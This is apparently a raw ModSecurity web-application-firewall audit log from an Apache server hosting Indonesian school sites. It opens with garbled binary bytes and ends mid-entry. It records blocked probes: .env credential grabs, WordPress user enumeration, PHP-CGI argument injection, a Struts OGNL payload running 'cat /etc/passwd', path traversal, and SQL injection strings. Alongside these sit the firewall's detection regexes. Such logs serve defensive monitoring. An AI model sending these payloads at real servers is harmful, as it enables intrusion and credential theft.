¸ï¿£ë—KzEq-…‰÷Ù:ÅR(?XýòÚõo¿ka!E”©1ÕF¼`-mÖI³NÎÖÛÑ;c×B/ê}¼°~õáé‡6Z»X6–²]‰å!–D³òÚš,¸;wѤ}èh Î;¶¥ÉFER³òŒKû{事ß>}^{ñõŸô•™~À‚g¬Ì°JIüì }»~£åÇ)·±8D¤Éëû6SCtœeI±DµhË…œVßP•'O„‹*ßNÑFá ¢m½Ì{äØŠY3·Yg5¸ŸóúôGâlÓ—|]òÉѵ¬ªËAÙß”|’ŸÈ ¤­­IlÉK"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748582782455945 2247 (- - -) Stopwatch2: 1748582782455945 2247; combined=1014, p1=421, p2=563, p3=0, p4=0, p5=30, sr=118, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7840a12d-Z-- --ab560d15-A-- [30/May/2025:12:48:48 +0700] aDlGwJxu2QkuXt3B9jabAwAAAJc 103.236.140.4 46492 103.236.140.4 8181 --ab560d15-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 188.166.108.93 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 188.166.108.93 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ab560d15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab560d15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748584128793223 764 (- - -) Stopwatch2: 1748584128793223 764; combined=302, p1=265, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab560d15-Z-- --140cce23-A-- [30/May/2025:12:54:59 +0700] aDlIM4Wl_OZMPH_FZ2DVAgAAAME 103.236.140.4 46568 103.236.140.4 8181 --140cce23-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.151.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.151.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --140cce23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --140cce23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748584499656015 2865 (- - -) Stopwatch2: 1748584499656015 2865; combined=1308, p1=442, p2=837, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --140cce23-Z-- --3f790701-A-- [30/May/2025:13:04:08 +0700] aDlKWLW504ObxUT6Rrz-dwAAAAI 103.236.140.4 46622 103.236.140.4 8181 --3f790701-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 66.228.43.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 66.228.43.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3f790701-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f790701-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748585048919896 2823 (- - -) Stopwatch2: 1748585048919896 2823; combined=1265, p1=444, p2=790, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f790701-Z-- --9902ea0b-A-- [30/May/2025:13:09:32 +0700] aDlLnLW504ObxUT6Rrz-gQAAABE 103.236.140.4 46704 103.236.140.4 8181 --9902ea0b-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 159.89.174.87 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 159.89.174.87 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --9902ea0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9902ea0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748585372075518 751 (- - -) Stopwatch2: 1748585372075518 751; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9902ea0b-Z-- --ace4f70a-A-- [30/May/2025:13:36:06 +0700] aDlR1hNBDSvkc-tIZOnn_wAAAE0 103.236.140.4 46902 103.236.140.4 8181 --ace4f70a-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.189.233.36 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.189.233.36 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ace4f70a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ace4f70a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748586966498859 678 (- - -) Stopwatch2: 1748586966498859 678; combined=250, p1=223, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ace4f70a-Z-- --61c35009-A-- [30/May/2025:14:55:51 +0700] aDlkh4Wl_OZMPH_FZ2DZVwAAANc 103.236.140.4 33592 103.236.140.4 8181 --61c35009-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.178.94.73 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.178.94.73 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --61c35009-C-- --61c35009-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61c35009-E-- --61c35009-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748591751792242 5487 (- - -) Stopwatch2: 1748591751792242 5487; combined=4218, p1=489, p2=3672, p3=0, p4=0, p5=57, sr=100, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61c35009-Z-- --5ca4a26a-A-- [30/May/2025:15:18:57 +0700] aDlp8bW504ObxUT6RrwB5gAAAAQ 103.236.140.4 34064 103.236.140.4 8181 --5ca4a26a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 3.141.23.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 3.141.23.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ca4a26a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ca4a26a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748593137543886 3424 (- - -) Stopwatch2: 1748593137543886 3424; combined=1496, p1=490, p2=973, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ca4a26a-Z-- --e0270f39-A-- [30/May/2025:15:25:27 +0700] aDlrd5xu2QkuXt3B9jafcwAAAJY 103.236.140.4 34156 103.236.140.4 8181 --e0270f39-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --e0270f39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0270f39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748593527817508 945 (- - -) Stopwatch2: 1748593527817508 945; combined=356, p1=317, p2=0, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0270f39-Z-- --280dfe60-A-- [30/May/2025:15:27:58 +0700] aDlsDrW504ObxUT6RrwB-wAAAAs 103.236.140.4 35238 103.236.140.4 8181 --280dfe60-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.20.83.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.20.83.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --280dfe60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --280dfe60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748593678377920 3282 (- - -) Stopwatch2: 1748593678377920 3282; combined=1376, p1=510, p2=837, p3=0, p4=0, p5=29, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --280dfe60-Z-- --5c8a6c20-A-- [30/May/2025:15:30:41 +0700] aDlssYWl_OZMPH_FZ2Da0AAAAM8 103.236.140.4 35272 103.236.140.4 8181 --5c8a6c20-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 159.65.189.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.65.189.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5c8a6c20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c8a6c20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748593841153191 2961 (- - -) Stopwatch2: 1748593841153191 2961; combined=1282, p1=455, p2=797, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c8a6c20-Z-- --ce17ba1a-A-- [30/May/2025:15:34:00 +0700] aDlteLW504ObxUT6RrwCBQAAABg 103.236.140.4 35284 103.236.140.4 8181 --ce17ba1a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.115.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.115.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Accept-Charset: utf-8 --ce17ba1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce17ba1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748594040027050 901 (- - -) Stopwatch2: 1748594040027050 901; combined=390, p1=340, p2=0, p3=0, p4=0, p5=49, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce17ba1a-Z-- --61c3ff70-A-- [30/May/2025:15:36:15 +0700] aDlt_4Wl_OZMPH_FZ2Da1gAAANE 103.236.140.4 35306 103.236.140.4 8181 --61c3ff70-B-- POST /login.action HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 596 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded --61c3ff70-C-- username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D --61c3ff70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61c3ff70-E-- --61c3ff70-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /login.action"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594175509247 2215 (- - -) Stopwatch2: 1748594175509247 2215; combined=687, p1=478, p2=173, p3=0, p4=0, p5=35, sr=81, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61c3ff70-Z-- --c3cbf32d-A-- [30/May/2025:15:36:15 +0700] aDlt_5xu2QkuXt3B9jafzAAAAIM 103.236.140.4 35318 103.236.140.4 8181 --c3cbf32d-B-- POST /scripts/setup.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 80 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --c3cbf32d-C-- action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} --c3cbf32d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3cbf32d-E-- --c3cbf32d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/setup.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594175509999 1647 (- - -) Stopwatch2: 1748594175509999 1647; combined=417, p1=296, p2=88, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3cbf32d-Z-- --d8b6677b-A-- [30/May/2025:15:36:15 +0700] aDlt_xNBDSvkc-tIZOnr2QAAAEc 103.236.140.4 35322 103.236.140.4 8181 --d8b6677b-B-- GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Mobile/15E148 Safari/604.1 --d8b6677b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8b6677b-E-- --d8b6677b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594175510729 1485 (- - -) Stopwatch2: 1748594175510729 1485; combined=471, p1=330, p2=112, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8b6677b-Z-- --e0f18873-A-- [30/May/2025:15:36:15 +0700] aDlt_xNBDSvkc-tIZOnr2gAAAEs 103.236.140.4 35324 103.236.140.4 8181 --e0f18873-B-- GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh: Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 --e0f18873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0f18873-E-- --e0f18873-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 1 UNION SELECT md5(999999999) as id from HrmResourceManager found within MATCHED_VAR: 1 UNION SELECT md5(999999999) as id from HrmResourceManager"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594175510922 1978 (- - -) Stopwatch2: 1748594175510922 1978; combined=1162, p1=242, p2=893, p3=0, p4=0, p5=27, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0f18873-Z-- --fe9f225b-A-- [30/May/2025:15:36:15 +0700] aDlt_7W504ObxUT6RrwCCAAAAAs 103.236.140.4 35314 103.236.140.4 8181 --fe9f225b-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fe9f225b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe9f225b-E-- --fe9f225b-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
